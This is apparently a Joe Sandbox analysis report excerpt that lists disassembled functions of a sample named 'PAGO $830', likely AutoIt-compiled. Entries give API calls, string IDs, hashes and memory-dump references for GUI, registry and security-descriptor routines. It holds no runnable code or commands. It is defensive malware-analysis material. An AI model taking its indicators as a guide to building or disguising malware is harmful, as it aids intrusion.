                                                          • SetTextColor.GDI32(?,00000000), ref: 00E07465
                                                          • DrawTextW.USER32(?,00E06FC4,000000FF,?,00000000), ref: 00E07477
                                                          • SelectObject.GDI32(?,?), ref: 00E0748E
                                                          • DeleteObject.GDI32(?), ref: 00E07499
                                                          • SelectObject.GDI32(?,?), ref: 00E0749F
                                                          • DeleteObject.GDI32(?), ref: 00E074A4
                                                          • SetTextColor.GDI32(?,?), ref: 00E074AA
                                                          • SetBkColor.GDI32(?,?), ref: 00E074B4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: 2d3c1cc1329c8330f26fd3daa944e430bbb84945cee242fc1080e792656e828b
                                                          • Instruction ID: 16317d6a9b17498b45405a5bbc3773718db44b34d43568c196058676733b32af
                                                          • Opcode Fuzzy Hash: 2d3c1cc1329c8330f26fd3daa944e430bbb84945cee242fc1080e792656e828b
                                                          • Instruction Fuzzy Hash: C8616076D00218AFDB109FA5DC49EEE7BB9EB09320F204215F915BB2E1D775AD80DB90
                                                          Function 00E00F26 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00E0105B
                                                          • GetDesktopWindow.USER32 ref: 00E01070
                                                          • GetWindowRect.USER32(00000000), ref: 00E01077
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E010CC
                                                          • DestroyWindow.USER32(?), ref: 00E010EC
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E01120
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E0113E
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E01150
                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00E01165
                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00E01178
                                                          • IsWindowVisible.USER32(00000000), ref: 00E011D4
                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00E011EF
                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00E01203
                                                          • GetWindowRect.USER32(00000000,?), ref: 00E0121B
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00E01241
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00E0125B
                                                          • CopyRect.USER32(?,?), ref: 00E01272
                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 00E012DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: e4c2282f2b1129b46f437692cd13f7e0d238b804a74edd3cbf34fa5f441793b6
                                                          • Instruction ID: 6bbfbadec6309c604d95232fb39d26f6085a1b591262278c5472790fbea2fc78
                                                          • Opcode Fuzzy Hash: e4c2282f2b1129b46f437692cd13f7e0d238b804a74edd3cbf34fa5f441793b6
                                                          • Instruction Fuzzy Hash: 57B1AE71604341AFD714DF64C884B6BBBE4FF84704F109A5CF589AB2A1D731E884CBA2
                                                          Function 00E00174 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00E00218
                                                          • _wcslen.LIBCMT ref: 00E00252
                                                          • _wcslen.LIBCMT ref: 00E002BC
                                                          • _wcslen.LIBCMT ref: 00E00324
                                                          • _wcslen.LIBCMT ref: 00E003A8
                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E003F8
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E00437
                                                            • Part of subcall function 00D73536: _wcslen.LIBCMT ref: 00D73541
                                                            • Part of subcall function 00DD2183: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DD219C
                                                            • Part of subcall function 00DD2183: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DD21CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                          • API String ID: 1103490817-719923060
                                                          • Opcode ID: 7979818e853eb109ce3bd1c15fea29c2691af0f35e25f9a953674c22eebbfd75
                                                          • Instruction ID: 8cb6372fd08b873c0a0c86c1efe7f76d18cde68046c2e9ce8035cf853083e769
                                                          • Opcode Fuzzy Hash: 7979818e853eb109ce3bd1c15fea29c2691af0f35e25f9a953674c22eebbfd75
                                                          • Instruction Fuzzy Hash: EFE1C1312183418FC724DF24C45196AB7E6FF98318F14996DF49AA7392DB30ED85CB62
                                                          Function 00D8E825 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D8E8FC
                                                          • GetSystemMetrics.USER32(00000007), ref: 00D8E904
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D8E92F
                                                          • GetSystemMetrics.USER32(00000008), ref: 00D8E937
                                                          • GetSystemMetrics.USER32(00000004), ref: 00D8E95C
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D8E979
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D8E989
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D8E9BC
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D8E9D0
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00D8E9EE
                                                          • GetStockObject.GDI32(00000011), ref: 00D8EA0A
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8EA15
                                                            • Part of subcall function 00D8EA9A: GetCursorPos.USER32(?), ref: 00D8EAAE
                                                            • Part of subcall function 00D8EA9A: ScreenToClient.USER32(?,?), ref: 00D8EACB
                                                            • Part of subcall function 00D8EA9A: GetAsyncKeyState.USER32(00000001), ref: 00D8EB02
                                                            • Part of subcall function 00D8EA9A: GetAsyncKeyState.USER32(00000002), ref: 00D8EB1C
                                                          • SetTimer.USER32(00000000,00000000,00000028,00D8A671), ref: 00D8EA3C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI
                                                          • API String ID: 1458621304-248962490
                                                          • Opcode ID: ca5e277187ac7f0f9c9d3aaab4b1f7a81121eef8cdecb8b478175602ebc61d62
                                                          • Instruction ID: 4b810250c897eecf0e44cdaf25107fea22667a4b15a83c9b379a1076d21a9c01
                                                          • Opcode Fuzzy Hash: ca5e277187ac7f0f9c9d3aaab4b1f7a81121eef8cdecb8b478175602ebc61d62
                                                          • Instruction Fuzzy Hash: 0AB17B75A0020A9FDF14EFA9DC45BAE3BB5FB48710F144269FA15A72A0D770E881CF60
                                                          Function 00DD0CCF Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DD103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1058
                                                            • Part of subcall function 00DD103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1064
                                                            • Part of subcall function 00DD103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD1073
                                                            • Part of subcall function 00DD103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DD0ADF,?,?,?), ref: 00DD107A
                                                            • Part of subcall function 00DD103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD1091
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DD0D39
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DD0D6D
                                                          • GetLengthSid.ADVAPI32(?), ref: 00DD0D84
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00DD0DBE
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DD0DDA
                                                          • GetLengthSid.ADVAPI32(?), ref: 00DD0DF1
                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00DD0DF9
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00DD0E00
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DD0E21
                                                          • CopySid.ADVAPI32(00000000), ref: 00DD0E28
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DD0E57
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DD0E79
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DD0E8B
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0EB2
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0EB9
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0EC2
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0EC9
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00DD0ED2
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0ED9
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00DD0EE5
                                                          • HeapFree.KERNEL32(00000000), ref: 00DD0EEC
                                                            • Part of subcall function 00DD10D7: GetProcessHeap.KERNEL32(00000008,00DD0AF5,?,00000000,?,00DD0AF5,?), ref: 00DD10E5
                                                            • Part of subcall function 00DD10D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,00DD0AF5,?), ref: 00DD10EC
                                                            • Part of subcall function 00DD10D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00DD0AF5,?), ref: 00DD10FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                          • String ID:
                                                          • API String ID: 4175595110-0
                                                          • Opcode ID: a2dcb09ff932e3b342a1471e3224a7b858e6b4d9895734a0d3519914d37b63ee
                                                          • Instruction ID: c89e73e9548b8d6a19c732d91a74534e96b1d722776cb334bc240ec8c5a4abde
                                                          • Opcode Fuzzy Hash: a2dcb09ff932e3b342a1471e3224a7b858e6b4d9895734a0d3519914d37b63ee
                                                          • Instruction Fuzzy Hash: 3A715A7290020AAFDF209FA5DC48BAEBBB9EF44310F184616F915F7291D7719A85CB70
                                                          Function 00E0822E Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 196windowlibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00E0824C
                                                          • _wcslen.LIBCMT ref: 00E08260
                                                          • _wcslen.LIBCMT ref: 00E08283
                                                          • _wcslen.LIBCMT ref: 00E082A6
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E082E4
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E05B27), ref: 00E08340
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E08379
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E083BC
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E083F3
                                                          • FreeLibrary.KERNEL32(?), ref: 00E083FF
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E0840F
                                                          • DestroyIcon.USER32(?,?,?,?,?,00E05B27), ref: 00E0841E
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E0843B
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E08447
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                          • String ID: '[$.dll$.exe$.icl
                                                          • API String ID: 799131459-3381137885
                                                          • Opcode ID: bcb59214706ece17caada0fb4f44d269ce98072d56f562249b1dd5c45d97e93d
                                                          • Instruction ID: d379a7fb3bbe71a38ff12c64404eeb03ee2952f228dc640a45f971300724854b
                                                          • Opcode Fuzzy Hash: bcb59214706ece17caada0fb4f44d269ce98072d56f562249b1dd5c45d97e93d
                                                          • Instruction Fuzzy Hash: 1361DE71600619BEEB14DF64CD85FBE77A8FF08B10F204219F855E60D1DB75A984CBA0
                                                          Function 00DFC2DE Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFC3E4
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E0D0D0,00000000,?,00000000,?,?), ref: 00DFC46B
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DFC4CB
                                                          • _wcslen.LIBCMT ref: 00DFC51B
                                                          • _wcslen.LIBCMT ref: 00DFC596
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DFC5D9
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DFC6E8
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DFC774
                                                          • RegCloseKey.ADVAPI32(?), ref: 00DFC7A8
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00DFC7B5
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DFC887
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 9721498-966354055
                                                          • Opcode ID: b4597dde49e41e18420a8db85956114193bf1978fd8b67dff577f214d658b8c6
                                                          • Instruction ID: f73539091b2aa140c0758be44df9e934f4672e60c5d1cad95a5adfac24dc3128
                                                          • Opcode Fuzzy Hash: b4597dde49e41e18420a8db85956114193bf1978fd8b67dff577f214d658b8c6
                                                          • Instruction Fuzzy Hash: E2128C356042049FCB14DF14C985A2AB7E5FF88314F19C89DF99A9B3A2DB31ED41CBA1
                                                          Function 00E00851 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00E008F9
                                                          • _wcslen.LIBCMT ref: 00E00934
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E00987
                                                          • _wcslen.LIBCMT ref: 00E009BD
                                                          • _wcslen.LIBCMT ref: 00E00A39
                                                          • _wcslen.LIBCMT ref: 00E00AB4
                                                            • Part of subcall function 00D73536: _wcslen.LIBCMT ref: 00D73541
                                                            • Part of subcall function 00DD2B2C: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DD2B3E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 1103490817-4258414348
                                                          • Opcode ID: a91459eac8985d7168c082bac8c1f3b5e9aed745832381cee8a8103fe3996d7a
                                                          • Instruction ID: 399f236b9c3831c290722a7cc51e0b3463dc0f4fce0efbc69f77dbf554bc6e7f
                                                          • Opcode Fuzzy Hash: a91459eac8985d7168c082bac8c1f3b5e9aed745832381cee8a8103fe3996d7a
                                                          • Instruction Fuzzy Hash: D8E18E312083418FC714DF24C49196AB7E2FF98318F54995DF8996B392DB31ED85CBA2
                                                          Function 00DFC8BF Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 1256254125-909552448
                                                          • Opcode ID: 4a8e199458469932005795add123cdc6b62770989b849052f513fc0f256a250e
                                                          • Instruction ID: 3434b6ca0f6509253f65b46c123991b1f364c9027eb49104853af55b4a81da80
                                                          • Opcode Fuzzy Hash: 4a8e199458469932005795add123cdc6b62770989b849052f513fc0f256a250e
                                                          • Instruction Fuzzy Hash: D3714E3262415E8BCB20DF7CCE415BA3391EF60354F1BA129E9A5A7284E671DE64C770
                                                          Function 00D790F8 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 0-1645009161
                                                          • Opcode ID: b37b932a99f1ce8c36761827d0ddd9057b1670c60dcca4d80524b2ba17c8d3a4
                                                          • Instruction ID: 88cfff639e731b4cf4a43c1a958dc45fbf3ea21404b850ae1044adca2b676a75
                                                          • Opcode Fuzzy Hash: b37b932a99f1ce8c36761827d0ddd9057b1670c60dcca4d80524b2ba17c8d3a4
                                                          • Instruction Fuzzy Hash: 9C81F272600306BACB21AF60DC56FAE77A8EF05740F088024FA09AA1D6FB75D951D7B1
                                                          Function 00DD5971 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 00DD5984
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DD5996
                                                          • SetWindowTextW.USER32(?,?), ref: 00DD59AD
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00DD59C2
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00DD59C8
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00DD59D8
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00DD59DE
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DD59FF
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DD5A19
                                                          • GetWindowRect.USER32(?,?), ref: 00DD5A22
                                                          • _wcslen.LIBCMT ref: 00DD5A89
                                                          • SetWindowTextW.USER32(?,?), ref: 00DD5AC5
                                                          • GetDesktopWindow.USER32 ref: 00DD5ACB
                                                          • GetWindowRect.USER32(00000000), ref: 00DD5AD2
                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00DD5B29
                                                          • GetClientRect.USER32(?,?), ref: 00DD5B36
                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00DD5B5B
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DD5B85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                          • String ID:
                                                          • API String ID: 895679908-0
                                                          • Opcode ID: 18a3b97fb6f91e4529a4e13f0e07be4059feddfb27160250b9148085a06ad36b
                                                          • Instruction ID: af4e2f856f38ec340033036d93a6fc9de5c62bcdfccf878724308f7c6b30b872
                                                          • Opcode Fuzzy Hash: 18a3b97fb6f91e4529a4e13f0e07be4059feddfb27160250b9148085a06ad36b
                                                          • Instruction Fuzzy Hash: 05716B31900A05AFDB20DFA9DD85BAEBBF5FF48704F14061AE182A26A4D771E944CF60
                                                          Function 00D90046 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D90046
